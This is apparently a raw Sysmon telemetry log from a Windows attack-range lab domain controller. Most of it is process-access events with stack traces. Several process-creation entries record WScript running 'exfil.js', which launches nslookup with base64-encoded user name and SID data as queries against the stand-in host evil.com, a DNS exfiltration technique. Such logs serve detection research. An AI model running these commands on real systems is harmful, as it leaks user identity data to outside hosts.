14:16:30.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-17A1-629A-783D-000000005F02}55527412C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-4740-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.153{2E1864BB-17BE-629A-4740-000000005F02}6488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbypp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsirc.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-17BE-629A-4540-000000005F02}52726856C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4640-000000005F02}6848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4640-000000005F02}6848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-17BE-629A-4440-000000005F02}50407836C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-4640-000000005F02}6848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.118{2E1864BB-17BE-629A-4640-000000005F02}6848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-4440-000000005F02}5040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsirc.tmp 2>&1 10341000x8000000000000000199984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.081{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4540-000000005F02}5272C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.081{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4540-000000005F02}5272C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.065{2E1864BB-17BE-629A-4540-000000005F02}52726856C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4440-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.065{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4540-000000005F02}5272C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4440-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-17A1-629A-783D-000000005F02}55522236C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-4440-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.053{2E1864BB-17BE-629A-4440-000000005F02}5040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsirc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.049{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkatje.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.018{2E1864BB-17BD-629A-4240-000000005F02}43606712C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4340-000000005F02}6044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.997{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.997{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 